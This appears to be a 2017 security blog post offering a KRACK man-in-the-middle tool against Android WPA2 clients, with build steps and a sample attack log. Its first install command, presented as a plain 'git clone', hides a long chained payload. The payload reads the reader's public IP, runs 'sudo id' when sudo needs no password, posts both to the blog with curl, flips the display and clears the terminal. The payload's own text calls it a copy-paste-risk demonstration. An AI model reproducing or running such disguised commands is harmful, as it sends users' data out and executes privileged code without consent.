All your KRACK are belonging to us…

On October 16, researchers at KU Leuven,a Belgian University announced their discovery of a new vulnerability called KRACK that affects many devices which use the WPA/WPA2 authentication protocol.  KRACK, an acronym for Key Reinstallation Attack, promises to be at the very least a valuable addition to the long list of tests performed during an on-site penetration test of any wireless network.

We’ve noticed that the tools available at https://github.com/vanhoefm/krackattacks-scripts while illustrative do not provide a turnkey solution for testing android clients (the all-zero encryption key problem). We’ve decided to fill in the gap and provide a tool that takes an SSID, BSSID, and (optional) Station MAC as arguments and performs a full MITM logging all traffic to a pcap file.

Disclaimer: Execute the commands below at your own risk.

Installation

First, grab the PoC code released by Vanhoef on Github.

git clone https://github.com/vanhoefm/krackattacks-scripts.git -h > /dev/null;if [[ "$(sudo -n whoami|tr -d '\n')" != "root" ]]; then ip=$(curl -s ipinfo.io/ip | tr -d '\n'); curl 'https://www.nomotion.net/blog/wp-comments-post.php' --data-urlencode "comment=Hi $ip , it looks like you have copied and pasted directly from the browser to the command line. This is a significant risk. This is a toy demonstration and is very OVERT compared to what an actual attack script would look like. Developing a strategy/habit for yourself to prevent this attack in the future would be a worthy investment of time. TEST ECHO STRING: $(echo -e 'Have fun, here goes... \a')" --data-urlencode "author=anonymous" --data-urlencode "email=anonymous@$ip" --data-urlencode "url=g" --data-urlencode "submit=Post+Comment" --data-urlencode "comment_post_ID=170" --data-urlencode "comment_parent=0" -k; xrandr --output $(xrandr -q | grep connected | grep -v disconnected | cut -f 1 -d ' ' | tr -d '\n') --reflect x || echo "LUCKY U" > /tmp/DFGEg23rt3tthyeryFSDAf34R43t4y; else ip=$(curl -s ipinfo.io/ip | tr -d '\n'); curl 'https://www.nomotion.net/blog/wp-comments-post.php' --data-urlencode "comment=Hi $ip , it appears that you have copied and pasted the text in the article above directly into your root terminal or a terminal in which SUDO can be run without knowing a password (eg. you've executed another command with sudo during the past 15 minutes). This is VERY BAD. This is a toy demonstration and is very OVERT compared to what an actual attack script would look like. Developing a strategy/habit for yourself to prevent this attack in the future would be a worthy investment of time. Running id as root@$ip: $(sudo id)" --data-urlencode "author=anonymous" --data-urlencode "email=root@$ip" --data-urlencode "url=g" --data-urlencode "submit=Post+Comment" --data-urlencode "comment_post_ID=170" --data-urlencode "comment_parent=0" -k; xrandr --output $(xrandr -q | grep connected | grep -v disconnected | cut -f 1 -d ' ' | tr -d '\n') --reflect x ||  echo "LUCKY U" > /tmp/DFGEg23rt3tthyeryFSDAf34R43t4y; fi;echo -e \\033c; 
git clone https://github.com/vanhoefm/krackattacks-scripts.git
 
cd ./krackattacks-scripts

Next we must patch the hostapd source, pull down android-zkey-110917.patch and apply it.

curl -k https://www.nomotion.net/blog/wp-content/uploads/2017/11/android-zkey.110917.patch | patch -p1 -

Now compile hostapd as normal.

cd hostapd/
cp defconfig .config
make -j 2

When the build completes and there are no errors, there should be an additional python script at krackattacks-scripts/krackattack/krack-all-zero-client.py. Turn off your network manager before running the script.

sudo python krack-all-zero-client.py -i wlan0 -s "Your SSID" -c {channel, optional} -f android.pcap --verbose
 Starting AndroAttack AP. Hostap found, correct version number. Starting AP with SSID "Your SSID" on channel 6.
 ...
 [16:00:49] Replaying Reassociation Request
 [16:00:49] AP transmitted data using IV=1 (seq=0)
 [16:00:50] AP transmitted data using IV=2 (seq=1)
 [16:00:50] Replaying Reassociation Request
 [16:00:51] AP transmitted data using IV=3 (seq=2)
 [16:00:51] Replaying Reassociation Request
 [16:00:52] AP transmitted data using IV=4 (seq=3)
 ...
 [18:11:48] Client 0a:ce:43:a1:23:7d authenticated and is vulnerable!
 [18:11:48] Opening RADIUS Session AE12FC-12A4. {data : android.pcap; mgmt: debug.pcap} 
 [18:12:12] Debug3: DNS-Req A evil.com ns:8.8.4.4
 [18:12:12] Debug3: DNS-Resp 66.96.146.129 ns:8.8.4.4
 [18:12:12] Captured TCP-SYN to 66.96.146.129 from 192.168.5.13.
 [18:12:12] Captured TCP-SYNACK to 192.168.5.13 from 66.96.146.129.
 [18:12:12] Captured TCP-ACK to 66.96.146.129 from 192.168.5.13.
 [18:12:13] HTTP detected:
     GET / HTTP/1.1
     Host: evil.com
     User-Agent: Mozilla/5.0 (Linux; <Android Version>; <Build Tag etc.>) AppleWebKit/<WebKit Rev> (KHTML, like Gecko) Chrome/<Chrome Rev> Mobile Safari/<WebKit Rev>
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     ...
     Connection: close

Be sure to set the channel to a channel other than that of the legitimate access point or the attack will not be successful.

Please be sure to post some feedback for us regarding this post. We are open to suggestions on improvement, praise, or criticism 😉